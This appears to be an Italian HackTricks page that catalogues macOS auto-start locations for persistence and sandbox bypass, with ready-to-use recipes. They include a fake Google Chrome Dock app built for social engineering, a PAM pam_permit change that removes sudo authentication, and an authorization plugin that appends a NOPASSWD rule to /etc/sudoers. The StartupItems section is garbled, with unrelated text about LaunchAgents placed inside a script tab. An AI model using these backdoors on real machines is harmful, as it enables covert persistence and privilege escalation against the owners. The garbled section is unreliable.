  • Ecco il modo per implementare questa persistenza tramite GUI:

Questo è lo script che verrà eseguito:

{% code title="source.js" %}

var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

{% endcode %}

Compilalo con: osacompile -l JavaScript -o folder.scpt source.js

Spostalo in:

mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"

Quindi, apri l'applicazione Folder Actions Setup, seleziona la cartella che desideri monitorare e seleziona nel tuo caso folder.scpt (nel mio caso l'ho chiamato output2.scp):

Ora, se apri quella cartella con Finder, lo script verrà eseguito.

Questa configurazione è stata memorizzata nel plist situato in ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist in formato base64.

Ora, proviamo a preparare questa persistenza senza accesso GUI:

  1. Copia ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist in /tmp per effettuarne il backup:
  • cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp
  1. Rimuovi le Folder Actions appena impostate:

Ora che abbiamo un ambiente vuoto

  1. Copia il file di backup: cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/
  2. Apri l'applicazione Folder Actions Setup.app per consumare questa configurazione: open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"

{% hint style="danger" %} E questo non ha funzionato per me, ma queste sono le istruzioni della guida:( {% endhint %}

Scorciatoie Dock

Guida: https://theevilbit.github.io/beyond/beyond_0027/

  • Utile per aggirare il sandbox:
  • Ma è necessario avere installata un'applicazione dannosa all'interno del sistema
  • Bypass TCC: 🔴

Posizione

  • ~/Library/Preferences/com.apple.dock.plist
  • Trigger: Quando l'utente fa clic sull'app all'interno del dock

Descrizione ed Esploito

Tutte le applicazioni che appaiono nel Dock sono specificate all'interno del plist: ~/Library/Preferences/com.apple.dock.plist

È possibile aggiungere un'applicazione semplicemente con:

{% code overflow="wrap" %}

# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'

# Restart Dock
killall Dock

{% endcode %}

Utilizzando un po' di ingegneria sociale potresti fingere di essere ad esempio Google Chrome nella dock e effettivamente eseguire il tuo script:

#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
killall Dock

Selezionatori di colore

Descrizione: https://theevilbit.github.io/beyond/beyond_0017

  • Utile per aggirare il sandbox: 🟠
  • Deve verificarsi un'azione molto specifica
  • Finirai in un altro sandbox
  • Bypass TCC: 🔴

Posizione

  • /Library/ColorPickers
  • Richiede privilegi di root
  • Trigger: Utilizzare il selettore di colore
  • ~/Library/ColorPickers
  • Trigger: Utilizzare il selettore di colore

Descrizione ed Exploit

Compila un bundle selettore di colore con il tuo codice (potresti utilizzare questo ad esempio) e aggiungi un costruttore (come nella sezione Screen Saver) e copia il bundle in ~/Library/ColorPickers.

Quindi, quando il selettore di colore viene attivato, anche il tuo codice dovrebbe essere attivato.

Nota che il binario che carica la tua libreria ha un sandbox molto restrittivo: /System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64

[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))

{% endcode %}

Plugin Finder Sync

Descrizione: https://theevilbit.github.io/beyond/beyond_0026/
Descrizione: https://objective-see.org/blog/blog_0x11.html

  • Utile per bypassare il sandbox: No, perché è necessario eseguire la propria app
  • Bypass TCC: ???

Posizione

  • Una specifica app

Descrizione & Exploit

Un esempio di applicazione con un'estensione Finder Sync può essere trovato qui.

Le applicazioni possono avere Estensioni Finder Sync. Questa estensione andrà all'interno di un'applicazione che verrà eseguita. Inoltre, affinché l'estensione possa eseguire il proprio codice, deve essere firmata con un valido certificato di sviluppatore Apple, deve essere sandboxed (anche se possono essere aggiunte eccezioni rilassate) e deve essere registrata con qualcosa del genere:

pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync

Screen Saver

Writeup: https://theevilbit.github.io/beyond/beyond_0016/
Writeup: https://posts.specterops.io/saving-your-access-d562bf5bf90b

  • Utile per bypassare il sandbox: 🟠
  • Ma finirai in un sandbox di un'applicazione comune
  • Bypass TCC: 🔴

Posizione

  • /System/Library/Screen Savers
  • Richiede privilegi di root
  • Trigger: Seleziona lo screen saver
  • /Library/Screen Savers
  • Richiede privilegi di root
  • Trigger: Seleziona lo screen saver
  • ~/Library/Screen Savers
  • Trigger: Seleziona lo screen saver

Descrizione & Exploit

Crea un nuovo progetto in Xcode e seleziona il template per generare un nuovo Screen Saver. Quindi, aggiungi del codice, ad esempio il seguente codice per generare log.

Compilalo, e copia il bundle .saver in ~/Library/Screen Savers. Successivamente, apri l'interfaccia grafica dello Screen Saver e se ci fai clic sopra, dovrebbe generare molti log:

{% code overflow="wrap" %}

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'

Timestamp                       (process)[PID]
2023-09-27 22:55:39.622369+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]

{% endcode %}

{% hint style="danger" %} Si noti che poiché all'interno dei diritti del binario che carica questo codice (/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver) è possibile trovare com.apple.security.app-sandbox sarai all'interno del sandbox dell'applicazione comune. {% endhint %}

Codice Saver:

//
//  ScreenSaverExampleView.m
//  ScreenSaverExample
//
//  Created by Carlos Polop on 27/9/23.
//

#import "ScreenSaverExampleView.h"

@implementation ScreenSaverExampleView

- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}

- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}

- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}

- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}

- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}

- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}

- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}

@end

Plugin Spotlight

writeup: https://theevilbit.github.io/beyond/beyond_0011/

  • Utile per aggirare il sandbox: 🟠
  • Ma finirai in un sandbox dell'applicazione
  • Bypass TCC: 🔴
  • Il sandbox sembra molto limitato

Posizione

  • ~/Library/Spotlight/
  • Trigger: Viene creato un nuovo file con un'estensione gestita dal plugin di Spotlight.
  • /Library/Spotlight/
  • Trigger: Viene creato un nuovo file con un'estensione gestita dal plugin di Spotlight.
  • Richiesto accesso come root
  • /System/Library/Spotlight/
  • Trigger: Viene creato un nuovo file con un'estensione gestita dal plugin di Spotlight.
  • Richiesto accesso come root
  • Some.app/Contents/Library/Spotlight/
  • Trigger: Viene creato un nuovo file con un'estensione gestita dal plugin di Spotlight.
  • Richiesta nuova app

Descrizione ed Esploitation

Spotlight è la funzione di ricerca integrata di macOS, progettata per fornire agli utenti un accesso rapido e completo ai dati sui loro computer.
Per facilitare questa rapida capacità di ricerca, Spotlight mantiene un database proprietario e crea un indice analizzando la maggior parte dei file, consentendo ricerche rapide sia attraverso i nomi dei file che attraverso i loro contenuti.

Il meccanismo sottostante di Spotlight coinvolge un processo centrale chiamato 'mds', che sta per 'metadata server'. Questo processo coordina l'intero servizio Spotlight. A complemento di questo, ci sono più demoni 'mdworker' che svolgono una varietà di compiti di manutenzione, come l'indicizzazione di diversi tipi di file (ps -ef | grep mdworker). Questi compiti sono resi possibili attraverso i plugin importatori di Spotlight, o ".mdimporter bundles", che consentono a Spotlight di comprendere e indicizzare contenuti in una vasta gamma di formati di file.

I plugin o bundle .mdimporter si trovano nei luoghi menzionati in precedenza e se compare un nuovo bundle viene caricato entro un minuto (non è necessario riavviare nessun servizio). Questi bundle devono indicare quali tipi di file ed estensioni possono gestire, in questo modo, Spotlight li utilizzerà quando viene creato un nuovo file con l'estensione indicata.

È possibile trovare tutti i mdimporter caricati eseguendo:

mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]

E ad esempio /Library/Spotlight/iBooksAuthor.mdimporter viene utilizzato per analizzare questo tipo di file (estensioni .iba e .book tra gli altri):

plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist

[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]

{% hint style="danger" %} Se controlli il Plist di altri mdimporter potresti non trovare l'ingresso UTTypeConformsTo. Questo perché è un Uniform Type Identifiers (UTI) integrato e non ha bisogno di specificare estensioni.

Inoltre, i plugin predefiniti di sistema hanno sempre la precedenza, quindi un attaccante può accedere solo ai file che non sono altrimenti indicizzati dai mdimporters di Apple. {% endhint %}

Per creare il tuo importatore puoi iniziare con questo progetto: https://github.com/megrimm/pd-spotlight-importer e poi cambiare il nome, il CFBundleDocumentTypes e aggiungere UTImportedTypeDeclarations in modo che supporti l'estensione che desideri supportare e rifletterle in schema.xml.
Poi modifica il codice della funzione GetMetadataForFile per eseguire il tuo payload quando viene creato un file con l'estensione elaborata.

Infine compila e copia il tuo nuovo .mdimporter in una delle posizioni precedenti e puoi controllare quando viene caricato monitorando i log o controllando mdimport -L.

Pannello delle preferenze

{% hint style="danger" %} Non sembra che questo funzioni più. {% endhint %}

Descrizione: https://theevilbit.github.io/beyond/beyond_0009/

  • Utile per bypassare il sandbox: 🟠
  • Richiede una specifica azione dell'utente
  • Bypass TCC: 🔴

Posizione

  • /System/Library/PreferencePanes
  • /Library/PreferencePanes
  • ~/Library/PreferencePanes

Descrizione

Non sembra che questo funzioni più.

Bypass del Sandbox di Root

{% hint style="success" %} Qui puoi trovare posizioni di avvio utili per il bypass del sandbox che ti permette di eseguire semplicemente qualcosa scrivendolo in un file essendo root e/o richiedendo altre condizioni strane. {% endhint %}

Periodico

Descrizione: https://theevilbit.github.io/beyond/beyond_0019/

  • Utile per bypassare il sandbox: 🟠
  • Ma devi essere root
  • Bypass TCC: 🔴

Posizione

  • /etc/periodic/daily, /etc/periodic/weekly, /etc/periodic/monthly, /usr/local/etc/periodic
  • Richiede privilegi di root
  • Trigger: Quando arriva il momento
  • /etc/daily.local, /etc/weekly.local o /etc/monthly.local
  • Richiede privilegi di root
  • Trigger: Quando arriva il momento

Descrizione & Sfruttamento

Gli script periodici (/etc/periodic) vengono eseguiti a causa dei launch daemons configurati in /System/Library/LaunchDaemons/com.apple.periodic*. Nota che gli script memorizzati in /etc/periodic/ vengono eseguiti come proprietario del file, quindi questo non funzionerà per un potenziale escalation di privilegi. {% code overflow="wrap" %}

# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r--  1 root  wheel  887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r--  1 root  wheel  895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r--  1 root  wheel  891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist

# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x  11 root  wheel  352 May 13 00:29 daily
drwxr-xr-x   5 root  wheel  160 May 13 00:29 monthly
drwxr-xr-x   3 root  wheel   96 May 13 00:29 weekly

/etc/periodic/daily:
total 72
-rwxr-xr-x  1 root  wheel  1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x  1 root  wheel   695 May 13 00:29 130.clean-msgs
[...]

/etc/periodic/monthly:
total 24
-rwxr-xr-x  1 root  wheel   888 May 13 00:29 199.rotate-fax
-rwxr-xr-x  1 root  wheel  1010 May 13 00:29 200.accounting
-rwxr-xr-x  1 root  wheel   606 May 13 00:29 999.local

/etc/periodic/weekly:
total 8
-rwxr-xr-x  1 root  wheel  620 May 13 00:29 999.local

{% endcode %}

Ci sono altri script periodici che verranno eseguiti indicati in /etc/defaults/periodic.conf:

grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local"				# Local scripts
weekly_local="/etc/weekly.local"			# Local scripts
monthly_local="/etc/monthly.local"			# Local scripts

Se riesci a scrivere uno qualsiasi dei file /etc/daily.local, /etc/weekly.local o /etc/monthly.local verrà eseguito prima o poi.

{% hint style="warning" %} Nota che lo script periodico verrà eseguito come proprietario dello script. Quindi se uno script è di proprietà di un utente regolare, verrà eseguito come tale utente (questo potrebbe prevenire attacchi di escalation dei privilegi). {% endhint %}

PAM

Writeup: Linux Hacktricks PAM
Writeup: https://theevilbit.github.io/beyond/beyond_0005/

  • Utile per aggirare il sandbox: 🟠
  • Ma è necessario essere root
  • Bypass TCC: 🔴

Posizione

  • Sempre richiesto il root

Descrizione ed Esploito

Poiché PAM è più focalizzato sulla persistenza e sul malware che sull'esecuzione semplice all'interno di macOS, questo blog non fornirà una spiegazione dettagliata, leggi i writeup per comprendere meglio questa tecnica.

Controlla i moduli PAM con:

ls -l /etc/pam.d

Una tecnica di persistenza/escalation dei privilegi che sfrutta PAM è semplice come modificare il modulo /etc/pam.d/sudo aggiungendo all'inizio la riga:

auth       sufficient     pam_permit.so

Quindi sembrerà qualcosa del genere:

# sudo: auth account password session
auth       sufficient     pam_permit.so
auth       include        sudo_local
auth       sufficient     pam_smartcard.so
auth       required       pam_opendirectory.so
account    required       pam_permit.so
password   required       pam_deny.so
session    required       pam_permit.so

E quindi qualsiasi tentativo di utilizzare sudo funzionerà.

{% hint style="danger" %} Si noti che questa directory è protetta da TCC, quindi è molto probabile che all'utente venga richiesto l'accesso. {% endhint %}

Plugin di Autorizzazione

Descrizione: https://theevilbit.github.io/beyond/beyond_0028/
Descrizione: https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65

  • Utile per aggirare il sandbox: 🟠
  • Ma è necessario essere root e apportare configurazioni aggiuntive
  • Bypass di TCC: ???

Posizione

  • /Library/Security/SecurityAgentPlugins/
  • Richiede privilegi di root
  • È anche necessario configurare il database di autorizzazione per utilizzare il plugin

Descrizione ed Esploito

È possibile creare un plugin di autorizzazione che verrà eseguito quando un utente effettua l'accesso per mantenere la persistenza. Per ulteriori informazioni su come creare uno di questi plugin, controlla le descrizioni precedenti (e fai attenzione, un plugin scritto male potrebbe bloccarti e dovresti pulire il tuo Mac dalla modalità di ripristino).

// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/

#import <Foundation/Foundation.h>

__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}

Sposta il bundle nella posizione da caricare:

cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/

Infine aggiungi la regola per caricare questo Plugin:

cat > /tmp/rule.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>class</key>
<string>evaluate-mechanisms</string>
<key>mechanisms</key>
<array>
<string>CustomAuth:login,privileged</string>
</array>
</dict>
</plist>
EOF

security authorizationdb write com.asdf.asdf < /tmp/rule.plist

Il evaluate-mechanisms informerà il framework di autorizzazione che sarà necessario chiamare un meccanismo esterno per l'autorizzazione. Inoltre, privileged farà sì che venga eseguito da root.

Attivalo con:

security authorize com.asdf.asdf

E poi il gruppo staff dovrebbe avere accesso sudo (leggi /etc/sudoers per confermare).

Man.conf

Writeup: https://theevilbit.github.io/beyond/beyond_0030/

  • Utile per bypassare il sandbox: 🟠
  • Ma è necessario essere root e l'utente deve utilizzare man
  • Bypass TCC: 🔴

Posizione

  • /private/etc/man.conf
  • Richiesto accesso root
  • /private/etc/man.conf: Ogni volta che viene utilizzato man

Descrizione ed Exploit

Il file di configurazione /private/etc/man.conf indica il binario/script da utilizzare quando si aprono i file di documentazione di man. Quindi il percorso dell'eseguibile potrebbe essere modificato in modo che ogni volta che l'utente utilizza man per leggere alcuni documenti, venga eseguita una backdoor.

Per esempio impostato in /private/etc/man.conf:

MANPAGER /tmp/view

E quindi crea /tmp/view come:

#!/bin/zsh

touch /tmp/manconf

/usr/bin/less -s

Apache2

Descrizione: https://theevilbit.github.io/beyond/beyond_0023/

  • Utile per bypassare il sandbox: 🟠
  • Ma è necessario essere root e che apache sia in esecuzione
  • Bypass TCC: 🔴
  • Httpd non ha diritti

Posizione

  • /etc/apache2/httpd.conf
  • Richiede privilegi di root
  • Trigger: Quando Apache2 viene avviato

Descrizione & Exploit

È possibile indicare in /etc/apache2/httpd.conf di caricare un modulo aggiungendo una riga come questa:

{% code overflow="wrap" %}

LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"

{% endcode %}

In questo modo i tuoi moduli compilati verranno caricati da Apache. L'unica cosa è che devi firmarli con un certificato Apple valido, oppure devi aggiungere un nuovo certificato attendibile nel sistema e firmarli con esso.

Poi, se necessario, per assicurarti che il server verrà avviato, potresti eseguire:

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

Esempio di codice per il Dylb:

#include <stdio.h>
#include <syslog.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}

Framework di audit BSM

Descrizione: https://theevilbit.github.io/beyond/beyond_0031/

  • Utile per aggirare il sandbox: 🟠
  • Ma è necessario essere root, auditd in esecuzione e causare un avviso
  • Bypass TCC: 🔴

Posizione

  • /etc/security/audit_warn
  • Richiede privilegi di root
  • Trigger: Quando auditd rileva un avviso

Descrizione ed Exploit

Ogni volta che auditd rileva un avviso, lo script /etc/security/audit_warn viene eseguito. Quindi potresti aggiungere il tuo payload.

echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn

Puoi forzare un avviso con sudo audit -n.

Elementi di Avvio

{% hint style="danger" %} Questo è deprecato, quindi non dovrebbe essere trovato in quelle directory. {% endhint %}

Lo StartupItem è una directory che dovrebbe essere posizionata all'interno di /Library/StartupItems/ o /System/Library/StartupItems/. Una volta che questa directory è stata creata, deve contenere due file specifici:

  1. Uno script rc: Uno script shell eseguito all'avvio.
  2. Un file plist, specificamente chiamato StartupParameters.plist, che contiene varie impostazioni di configurazione.

Assicurati che lo script rc e il file StartupParameters.plist siano correttamente posizionati all'interno della directory StartupItem affinché il processo di avvio li riconosca e li utilizzi.

{% tabs %} {% tab title="StartupParameters.plist" %}

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a description of this service</string>
<key>OrderPreference</key>
<string>None</string> <!--Other req services to execute before this -->
<key>Provides</key>
<array>
<string>superservicename</string> <!--Name of the services provided by this file -->
</array>
</dict>
</plist>

{% endtab %}

{% tab title="superservicename" %}

Posizioni di avvio automatico

Directory di avvio automatico dell'utente

Le applicazioni possono essere avviate automaticamente all'avvio del sistema copiando un collegamento al file dell'applicazione nella directory ~/Library/LaunchAgents/.

Per visualizzare ed eventualmente rimuovere gli elementi di avvio automatico presenti in questa directory, è possibile utilizzare il seguente comando:

ls ~/Library/LaunchAgents/

Per rimuovere un elemento di avvio automatico, è possibile utilizzare il comando rm seguito dal percorso del file dell'applicazione.

Directory di avvio automatico di sistema

Le applicazioni possono essere avviate automaticamente all'avvio del sistema copiando un collegamento al file dell'applicazione nella directory /Library/LaunchDaemons/.

Per visualizzare ed eventualmente rimuovere gli elementi di avvio automatico presenti in questa directory, è possibile utilizzare il seguente comando:

ls /Library/LaunchDaemons/

Per rimuovere un elemento di avvio automatico, è possibile utilizzare il comando sudo rm seguito dal percorso del file dell'applicazione.

{% endtab %}

#!/bin/sh
. /etc/rc.common

StartService(){
touch /tmp/superservicestarted
}

StopService(){
rm /tmp/superservicestarted
}

RestartService(){
echo "Restarting"
}

RunService "$1"

{% endtab %} {% endtabs %}

emond

{% hint style="danger" %} Non riesco a trovare questo componente nel mio macOS, per ulteriori informazioni controlla il writeup {% endhint %}

Writeup: https://theevilbit.github.io/beyond/beyond_0023/

Introdotto da Apple, emond è un meccanismo di logging che sembra essere sottosviluppato o possibilmente abbandonato, ma rimane comunque accessibile. Anche se non particolarmente utile per un amministratore Mac, questo servizio oscuro potrebbe fungere da metodo di persistenza sottile per attori minacciosi, probabilmente non notato dalla maggior parte degli amministratori macOS.

Per coloro che ne sono a conoscenza, identificare eventuali utilizzi maliziosi di emond è semplice. Il LaunchDaemon di sistema per questo servizio cerca script da eseguire in una singola directory. Per ispezionare ciò, può essere utilizzato il seguente comando:

ls -l /private/var/db/emondClients

XQuartz

Writeup: https://theevilbit.github.io/beyond/beyond_0018/

Posizione

  • /opt/X11/etc/X11/xinit/privileged_startx.d
  • Richiesto accesso come root
  • Trigger: Con XQuartz

Descrizione & Exploit

XQuartz non è più installato in macOS, quindi se desideri ulteriori informazioni consulta il writeup.

kext

{% hint style="danger" %} È così complicato installare kext anche come root che non considererò questo metodo per sfuggire alle sandbox o per la persistenza (a meno che tu non abbia un exploit) {% endhint %}

Posizione

Per installare un KEXT come elemento di avvio, deve essere installato in una delle seguenti posizioni:

  • /System/Library/Extensions
  • File KEXT integrati nel sistema operativo OS X.
  • /Library/Extensions
  • File KEXT installati da software di terze parti

È possibile elencare i file kext attualmente caricati con:

kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle

Per ulteriori informazioni su estensioni del kernel controlla questa sezione.

amstoold

Descrizione: https://theevilbit.github.io/beyond/beyond_0029/

Posizione

  • /usr/local/bin/amstoold
  • Richiede privilegi di root

Descrizione e Sfruttamento

Apparentemente il plist da /System/Library/LaunchAgents/com.apple.amstoold.plist stava utilizzando questo binario mentre esponendo un servizio XPC... il fatto è che il binario non esisteva, quindi potevi inserire qualcosa lì e quando il servizio XPC veniva chiamato, il tuo binario sarebbe stato eseguito.

Non riesco più a trovarlo nel mio macOS.

xsanctl

Descrizione: https://theevilbit.github.io/beyond/beyond_0015/

Posizione

  • /Library/Preferences/Xsan/.xsanrc
  • Richiede privilegi di root
  • Trigger: Quando il servizio viene avviato (raramente)

Descrizione e sfruttamento

Apparentemente non è molto comune eseguire questo script e non sono riuscito nemmeno a trovarlo nel mio macOS, quindi se desideri ulteriori informazioni consulta il writeup.

/etc/rc.common

{% hint style="danger" %} Questo non funziona nelle versioni moderne di MacOS {% endhint %}

È anche possibile inserire qui comandi che verranno eseguiti all'avvio. Esempio di uno script rc.common regolare:

#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#

######################
# Configure the shell #
######################

#
# Be strict
#
#set -e
set -u

#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH

#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
#    TERM=$(tset - -Q); export TERM
#fi

###################
# Useful functions #
###################

#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test

if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}

alias ConsoleMessage=echo

#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local     pid=""

if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi

if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}

#
# Generic action handler
#
RunService ()
{
case $1 in
start  ) StartService   ;;
stop   ) StopService    ;;
restart) RestartService ;;
*      ) echo "$0: unknown argument: $1";;
esac
}

Tecniche e strumenti di persistenza

{% hint style="success" %} Impara e pratica l'Hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Sostieni HackTricks
{% endhint %}